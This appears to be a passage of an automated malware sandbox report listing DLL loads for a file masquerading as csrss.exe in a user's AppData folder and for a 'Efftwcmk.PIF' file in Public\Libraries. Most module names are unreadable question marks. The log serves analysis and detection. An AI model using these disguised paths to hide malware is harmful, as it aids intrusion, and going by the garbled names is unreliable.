Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??????s?s.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
